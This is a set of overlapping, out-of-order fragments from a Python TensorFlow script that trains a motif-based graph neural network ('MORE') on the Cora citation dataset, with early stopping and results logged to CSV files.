"y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print results print(\"Epoch:\", '%04d' %",
"flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of motif features')",
"val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print results print(\"Epoch:\", '%04d' % (epoch",
"[] stop_epoch = 0 for epoch in range(FLAGS.epochs): t = time.time() stop_epoch =",
"seed = 123 np.random.seed(seed) tf.set_random_seed(seed) # Settings flags = tf.app.flags FLAGS = flags.FLAGS",
"placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch > FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\")",
"from __future__ import division from __future__ import print_function import time import tensorflow as",
"FLAGS.model == 'dense': support = [preprocess_adj(adj)] # Not used num_supports = 1 model_func",
"stopping (# of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of units in hidden layer 1.')",
"45-59 print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden =",
"= tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.') # 'cora', 'citeseer', 'pubmed'",
"val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration =",
"'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs', 500, 'Number of epochs to train.')",
"import package --------------------------# from __future__ import division from __future__ import print_function import time",
"500, 'Number of epochs to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep",
"1000, 2000] mo = [\"Hadamard\", \"Summation\", \"Connection\"] la = [32, 64, 128, 256,",
"model = model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize session sess = tf.Session() # Define",
"support = [preprocess_adj(adj)] # Not used num_supports = 1 model_func = MLP elif",
"loss on embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early stopping (# of epochs).')",
"'the hidden layer number of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer number",
"Initialize session sess = tf.Session() # Define model evaluation function def evaluate(features, support,",
"test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as f: for i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for",
"= [lr[i], le[i]] for j in range(0, 3): temp2 = temp1 + [mo[j]]",
"[] # Train model train_starttime = time.time() train_time_list = [] stop_epoch = 0",
"'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask':",
"__future__ import print_function import time import tensorflow as tf import winsound from Code_utils",
"val_loss, Tloss = [], [], [] # Train model train_starttime = time.time() train_time_list",
"embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early stopping (# of epochs).') flags.DEFINE_integer('hidden1', 16,",
"time.time() - test_starttime # Save with open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout,",
"'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.') # 'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate',",
"[] train_loss, val_loss, Tloss = [], [], [] # Train model train_starttime =",
"'MotifGCN' lr = [0.01, 0.001, 0.0003, 0.003] le = [300, 500, 1000, 2000]",
"= [300, 500, 1000, 2000] mo = [\"Hadamard\", \"Summation\", \"Connection\"] la = [32,",
"mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden = [mode[3]] # Load data adj, features, y_train,",
"[] train_acc, val_acc, Tacc = [], [], [] train_loss, val_loss, Tloss = [],",
"= flags.FLAGS flags.DEFINE_string('dataset', 'cora', 'Dataset string.') # 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model",
"f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as f: for i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\")",
"motiffeatures = load_data(FLAGS.dataset) # Some preprocessing features = preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if",
"test_starttime # Save with open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden),",
"as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list),",
"motif features') flags.DEFINE_list('property_embedding_hidden', [256], 'the hidden layer number of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256],",
"lr = [0.01, 0.001, 0.0003, 0.003] le = [300, 500, 1000, 2000] mo",
"mode_list.append(temp3) mode = mode_list[59] # 0-14, 15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate = mode[0]",
"'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2],",
"Tloss.append(test_cost) if epoch > FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization",
"- train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping * 2, 20):] # Testing test_starttime =",
"\"{:.5f}\".format(test_duration)) print(\"Max test acc = {:.5f}\".format(max(Tacc))) test_time = time.time() - test_starttime # Save",
"= sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time() - t_test) # Init variables",
"in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration = 500 # millisecond freq =",
"\"{:.5f}\".format(acc), \"time=\", \"{:.5f}\".format(time.time() - t)) train_time_list.append(time.time() - t) test_cost, test_acc, test_duration = evaluate(features,",
"f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tloss: f.write(\"{:.6f},\".format(i))",
"# Define placeholders placeholders = { 'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)], 'features':",
"epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of units in hidden layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum",
"temp3 = temp2 + [la[k]] mode_list.append(temp3) mode = mode_list[59] # 0-14, 15-29, 30-44,",
"support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1 + FLAGS.max_degree model_func = GCN elif",
"set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc = {:.5f}\".format(max(Tacc)))",
"Define model evaluation function def evaluate(features, support, labels, mask, motiffeatures, placeholders): t_test =",
"f: for i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\")",
"data adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset) #",
"tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper variable for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32) }",
"duration = evaluate(features, support, y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print",
"'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.') # 'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001,",
"[256], 'the hidden layer number of motif embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden layer",
"= GCN elif FLAGS.model == 'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1",
"f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as f:",
"3): temp2 = temp1 + [mo[j]] for k in range(0, 5): temp3 =",
"tf.Session() # Define model evaluation function def evaluate(features, support, labels, mask, motiffeatures, placeholders):",
"flags.DEFINE_integer('epochs', 500, 'Number of epochs to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 -",
"+ [la[k]] mode_list.append(temp3) mode = mode_list[59] # 0-14, 15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate",
"flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of embedding combination') # embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\"",
"combination') # embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\" # batch_run use_batch = False if",
"[mo[j]] for k in range(0, 5): temp3 = temp2 + [la[k]] mode_list.append(temp3) mode",
"motiffeatures, placeholders) outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time() - t_test)",
"model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time() - t_test) # Init variables sess.run(tf.global_variables_initializer()) cost_val",
"main process ---------------------------# # Set random seed seed = 123 np.random.seed(seed) tf.set_random_seed(seed) #",
"1 + FLAGS.max_degree model_func = GCN elif FLAGS.model == 'dense': support = [preprocess_adj(adj)]",
"'Weight for L2 loss on embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early stopping",
"train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout}) # Training step outs = sess.run([model.opt_op, model.loss, model.accuracy],",
"labels, mask, motiffeatures, placeholders) outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time()",
"package --------------------------# from __future__ import division from __future__ import print_function import time import",
"[], [] # Train model train_starttime = time.time() train_time_list = [] stop_epoch =",
"rate (1 - keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on embedding",
"Sound duration = 500 # millisecond freq = 600 # Hz winsound.Beep(freq, duration)",
"sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time() - t_test) # Init variables sess.run(tf.global_variables_initializer())",
"FLAGS.property_embedding_hidden = [mode[3]] # Load data adj, features, y_train, y_val, y_test, train_mask, val_mask,",
"results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc = {:.5f}\".format(max(Tacc))) test_time",
"epoch in range(FLAGS.epochs): t = time.time() stop_epoch = epoch + 1 # Construct",
"as tf import winsound from Code_utils import * from Code_models import GCN, MLP,",
"= False if use_batch: FLAGS.model = 'MotifGCN' lr = [0.01, 0.001, 0.0003, 0.003]",
"# Some preprocessing features = preprocess_features(features) motiffeatures = preprocess_features(motiffeatures) if FLAGS.model == 'gcn':",
"= mode_list[59] # 0-14, 15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs =",
"y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch > FLAGS.early_stopping and cost_val[-1] >",
"train_starttime = time.time() train_time_list = [] stop_epoch = 0 for epoch in range(FLAGS.epochs):",
"123 np.random.seed(seed) tf.set_random_seed(seed) # Settings flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset', 'cora',",
"placeholders) print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc",
"= evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\",",
"acc = {:.5f}\".format(max(Tacc))) test_time = time.time() - test_starttime # Save with open(\"Result\\\\Train_log.csv\", mode='a')",
"train_time = time.time() - train_starttime # Tacc = Tacc[-max(FLAGS.early_stopping * 2, 20):] #",
"for k in range(0, 5): temp3 = temp2 + [la[k]] mode_list.append(temp3) mode =",
"- t)) train_time_list.append(time.time() - t) test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask,",
"elif FLAGS.model == 'MORE': support = [preprocess_adj(adj)] # Not used num_supports = 1",
"train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as f: for i in train_loss: f.write(\"{:.6f},\".format(i))",
"> FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization Finished!\") train_time =",
"i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i",
"np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as f: for i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\")",
"= 0 for epoch in range(FLAGS.epochs): t = time.time() stop_epoch = epoch +",
"MLP, MORE #--------------------------- main process ---------------------------# # Set random seed seed = 123",
"# Author: <NAME> # Data: 2020-01-10 # Function: Run training #-------------------------- import package",
"# embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\" # batch_run use_batch = False if use_batch:",
"# Not used num_supports = 1 model_func = MORE else: raise ValueError('Invalid argument",
"f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration = 500 # millisecond freq = 600 #",
"\"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc = {:.5f}\".format(max(Tacc))) test_time =",
"(# of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of units in hidden layer 1.') flags.DEFINE_integer('max_degree',",
"'gcn_cheby': support = chebyshev_polynomials(adj, FLAGS.max_degree) num_supports = 1 + FLAGS.max_degree model_func = GCN",
"+ [mo[j]] for k in range(0, 5): temp3 = temp2 + [la[k]] mode_list.append(temp3)",
"'Model string.') # 'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.') flags.DEFINE_integer('epochs',",
"[] for i in range(0, 4): temp1 = [lr[i], le[i]] for j in",
"of embedding combination') # embeding_combination_method ---- \"Hadamard\", \"Summation\", \"Connection\" # batch_run use_batch =",
"= 123 np.random.seed(seed) tf.set_random_seed(seed) # Settings flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('dataset',",
"5): temp3 = temp2 + [la[k]] mode_list.append(temp3) mode = mode_list[59] # 0-14, 15-29,",
"[preprocess_adj(adj)] # Not used num_supports = 1 model_func = MORE else: raise ValueError('Invalid",
"flags.DEFINE_list('integration_hidden', [], 'the hidden layer number of integration') flags.DEFINE_string('embeding_combination_method', \"Hadamard\", 'the method of",
"acc, duration = evaluate(features, support, y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) #",
"= Tacc[-max(FLAGS.early_stopping * 2, 20):] # Testing test_starttime = time.time() test_cost, test_acc, test_duration",
"20):] # Testing test_starttime = time.time() test_cost, test_acc, test_duration = evaluate(features, support, y_test,",
"0-14, 15-29, 30-44, 45-59 print(mode) FLAGS.learning_rate = mode[0] FLAGS.epochs = mode[1] FLAGS.embeding_combination_method =",
"FLAGS.embeding_combination_method = mode[2] FLAGS.motif_embedding_hidden = [mode[3]] FLAGS.property_embedding_hidden = [mode[3]] # Load data adj,",
"= construct_feed_dict(features, support, labels, mask, motiffeatures, placeholders) outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return",
"le[i]] for j in range(0, 3): temp2 = temp1 + [mo[j]] for k",
"hidden layer number of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer number of",
"mask, motiffeatures, placeholders) outs_val = sess.run([model.loss, model.accuracy], feed_dict=feed_dict_val) return outs_val[0], outs_val[1], (time.time() -",
"epoch + 1 # Construct feed dictionary feed_dict = construct_feed_dict(features, support, y_train, train_mask,",
"support, y_val, val_mask, motiffeatures, placeholders) cost_val.append(cost) val_acc.append(acc) val_loss.append(cost) # Print results print(\"Epoch:\", '%04d'",
"# Train model train_starttime = time.time() train_time_list = [] stop_epoch = 0 for",
"= [mode[3]] # Load data adj, features, y_train, y_val, y_test, train_mask, val_mask, test_mask,",
"128, 256, 512] mode_list = [] for i in range(0, 4): temp1 =",
"'MORE', 'Model string.') # 'gcn', 'gcn_cheby', 'dense', 'MORE' flags.DEFINE_float('learning_rate', 0.001, 'Initial learning rate.')",
"if epoch > FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization Finished!\")",
"def evaluate(features, support, labels, mask, motiffeatures, placeholders): t_test = time.time() feed_dict_val = construct_feed_dict(features,",
"train_time_list.append(time.time() - t) test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders)",
"test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) print(\"Test set results:\",",
"'num_motif_features_nonzero': tf.placeholder(tf.int32) } # Create model model = model_func(placeholders, input_dim=features[2][1], logging=True) # Initialize",
"= 1 model_func = MLP elif FLAGS.model == 'MORE': support = [preprocess_adj(adj)] #",
"model train_starttime = time.time() train_time_list = [] stop_epoch = 0 for epoch in",
"k in range(0, 5): temp3 = temp2 + [la[k]] mode_list.append(temp3) mode = mode_list[59]",
"'labels': tf.placeholder(tf.float32, shape=(None, y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper",
"motiffeatures, placeholders) print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test",
"temp1 + [mo[j]] for k in range(0, 5): temp3 = temp2 + [la[k]]",
"test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with open(\"Result\\\\Loss.csv\", mode='a') as f: for i in",
"3, 'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim of motif features') flags.DEFINE_list('property_embedding_hidden',",
"== 'MORE': support = [preprocess_adj(adj)] # Not used num_supports = 1 model_func =",
"[], [] train_loss, val_loss, Tloss = [], [], [] # Train model train_starttime",
"with open(\"Result\\\\Loss.csv\", mode='a') as f: for i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i",
"f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost, max(Tacc),test_duration,stop_epoch, train_time, np.mean(train_time_list), test_time)) with",
"= { 'support': [tf.sparse_placeholder(tf.float32) for _ in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures':",
"Set random seed seed = 123 np.random.seed(seed) tf.set_random_seed(seed) # Settings flags = tf.app.flags",
"layer number of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer number of motif",
"f.write(\"\\n\") for i in Tloss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") with open(\"Result\\\\Acc.csv\", mode='a') as f: for",
"'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper variable for sparse dropout 'num_motif_features_nonzero': tf.placeholder(tf.int32)",
"'Dataset string.') # 'cora', 'citeseer', 'pubmed' flags.DEFINE_string('model', 'MORE', 'Model string.') # 'gcn', 'gcn_cheby',",
"num_supports = 1 model_func = MORE else: raise ValueError('Invalid argument for model: '",
"matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early stopping (# of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number",
"'%04d' % (epoch + 1), \"train_loss=\", \"{:.5f}\".format(outs[1]), \"train_acc=\", \"{:.5f}\".format(outs[2]), \"val_loss=\", \"{:.5f}\".format(cost), \"val_acc=\", \"{:.5f}\".format(acc),",
"in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound duration",
"else: raise ValueError('Invalid argument for model: ' + str(FLAGS.model)) # Define placeholders placeholders",
"to train.') flags.DEFINE_float('dropout', 0.5, 'Dropout rate (1 - keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight",
"for early stopping (# of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of units in hidden",
"in range(num_supports)], 'features': tf.sparse_placeholder(tf.float32, shape=tf.constant(features[2], dtype=tf.int64)), 'motiffeatures': tf.sparse_placeholder(tf.float32, shape=tf.constant(motiffeatures[2], dtype=tf.int64)), 'labels': tf.placeholder(tf.float32, shape=(None,",
"outs_val[1], (time.time() - t_test) # Init variables sess.run(tf.global_variables_initializer()) cost_val = [] train_acc, val_acc,",
"import division from __future__ import print_function import time import tensorflow as tf import",
"in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in",
"import winsound from Code_utils import * from Code_models import GCN, MLP, MORE #---------------------------",
"labels, mask, motiffeatures, placeholders): t_test = time.time() feed_dict_val = construct_feed_dict(features, support, labels, mask,",
"# Data: 2020-01-10 # Function: Run training #-------------------------- import package --------------------------# from __future__",
"keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss on embedding matrix.') flags.DEFINE_integer('early_stopping', 30,",
"- test_starttime # Save with open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\",
"print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost), \"accuracy=\", \"{:.5f}\".format(test_acc), \"time=\", \"{:.5f}\".format(test_duration)) print(\"Max test acc =",
"flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early stopping (# of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of",
"i in val_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tacc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") # Sound",
"placeholders): t_test = time.time() feed_dict_val = construct_feed_dict(features, support, labels, mask, motiffeatures, placeholders) outs_val",
"for model: ' + str(FLAGS.model)) # Define placeholders placeholders = { 'support': [tf.sparse_placeholder(tf.float32)",
"hidden layer number of motif embedding') flags.DEFINE_list('integration_hidden', [], 'the hidden layer number of",
"---------------------------# # Set random seed seed = 123 np.random.seed(seed) tf.set_random_seed(seed) # Settings flags",
"[256], 'the hidden layer number of property embedding') flags.DEFINE_list('motif_embedding_hidden', [256], 'the hidden layer",
"--------------------------# from __future__ import division from __future__ import print_function import time import tensorflow",
"[preprocess_adj(adj)] num_supports = 1 model_func = GCN elif FLAGS.model == 'gcn_cheby': support =",
"= time.time() - test_starttime # Save with open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate,",
"#--------------------------- main process ---------------------------# # Set random seed seed = 123 np.random.seed(seed) tf.set_random_seed(seed)",
"L2 loss on embedding matrix.') flags.DEFINE_integer('early_stopping', 30, 'Tolerance for early stopping (# of",
"= 'MotifGCN' lr = [0.01, 0.001, 0.0003, 0.003] le = [300, 500, 1000,",
"return outs_val[0], outs_val[1], (time.time() - t_test) # Init variables sess.run(tf.global_variables_initializer()) cost_val = []",
"range(FLAGS.epochs): t = time.time() stop_epoch = epoch + 1 # Construct feed dictionary",
"epoch > FLAGS.early_stopping and cost_val[-1] > np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization Finished!\") train_time",
"motiffeatures, placeholders): t_test = time.time() feed_dict_val = construct_feed_dict(features, support, labels, mask, motiffeatures, placeholders)",
"test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) print(\"Test set results:\", \"cost=\", \"{:.5f}\".format(test_cost),",
"from Code_utils import * from Code_models import GCN, MLP, MORE #--------------------------- main process",
"Init variables sess.run(tf.global_variables_initializer()) cost_val = [] train_acc, val_acc, Tacc = [], [], []",
"mode='a') as f: for i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_acc:",
"# Tacc = Tacc[-max(FLAGS.early_stopping * 2, 20):] # Testing test_starttime = time.time() test_cost,",
"model.accuracy], feed_dict=feed_dict) train_acc.append(outs[2]) train_loss.append(outs[1]) # Validation cost, acc, duration = evaluate(features, support, y_val,",
"= [] stop_epoch = 0 for epoch in range(FLAGS.epochs): t = time.time() stop_epoch",
"# Init variables sess.run(tf.global_variables_initializer()) cost_val = [] train_acc, val_acc, Tacc = [], [],",
"Construct feed dictionary feed_dict = construct_feed_dict(features, support, y_train, train_mask, motiffeatures, placeholders) feed_dict.update({placeholders['dropout']: FLAGS.dropout})",
"train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in Tloss:",
"= GCN elif FLAGS.model == 'dense': support = [preprocess_adj(adj)] # Not used num_supports",
"np.mean(cost_val[-(FLAGS.early_stopping+1):-1]): print(\"Early stopping...\") break print(\"Optimization Finished!\") train_time = time.time() - train_starttime # Tacc",
"# Not used num_supports = 1 model_func = MLP elif FLAGS.model == 'MORE':",
"of epochs).') flags.DEFINE_integer('hidden1', 16, 'Number of units in hidden layer 1.') flags.DEFINE_integer('max_degree', 3,",
"f.write(\"\\n\") # Sound duration = 500 # millisecond freq = 600 # Hz",
"units in hidden layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6,",
"hidden layer 1.') flags.DEFINE_integer('max_degree', 3, 'Maximum Chebyshev polynomial degree.') flags.DEFINE_integer('motif_feature_dim', 6, 'the dim",
"t) test_cost, test_acc, test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost)",
"with open(\"Result\\\\Train_log.csv\", mode='a') as f: f.write(\"{},{},{},{},{},{},{},{},{},{:.4f},{:.4f},(best={:.4f}),{:.4f},{},{:.6f},{:.6f},{:.6f}\\n\".\\ format(seed,FLAGS.dataset,FLAGS.model,FLAGS.learning_rate, FLAGS.dropout, FLAGS.embeding_combination_method,\\ str(FLAGS.property_embedding_hidden), str(FLAGS.motif_embedding_hidden), str(FLAGS.integration_hidden),\\ test_acc,test_cost,",
"y_train.shape[1])), 'labels_mask': tf.placeholder(tf.int32), 'dropout': tf.placeholder_with_default(0., shape=()), 'num_features_nonzero': tf.placeholder(tf.int32), # helper variable for sparse",
"test_duration = evaluate(features, support, y_test, test_mask, motiffeatures, placeholders) Tacc.append(test_acc) Tloss.append(test_cost) if epoch >",
"as f: for i in train_acc: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_acc: f.write(\"{:.6f},\".format(i))",
"0.5, 'Dropout rate (1 - keep probability).') flags.DEFINE_float('weight_decay', 5e-4, 'Weight for L2 loss",
"= {:.5f}\".format(max(Tacc))) test_time = time.time() - test_starttime # Save with open(\"Result\\\\Train_log.csv\", mode='a') as",
"t_test = time.time() feed_dict_val = construct_feed_dict(features, support, labels, mask, motiffeatures, placeholders) outs_val =",
"train_mask, val_mask, test_mask, motiffeatures = load_data(FLAGS.dataset) # Some preprocessing features = preprocess_features(features) motiffeatures",
"i in train_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i in val_loss: f.write(\"{:.6f},\".format(i)) f.write(\"\\n\") for i",
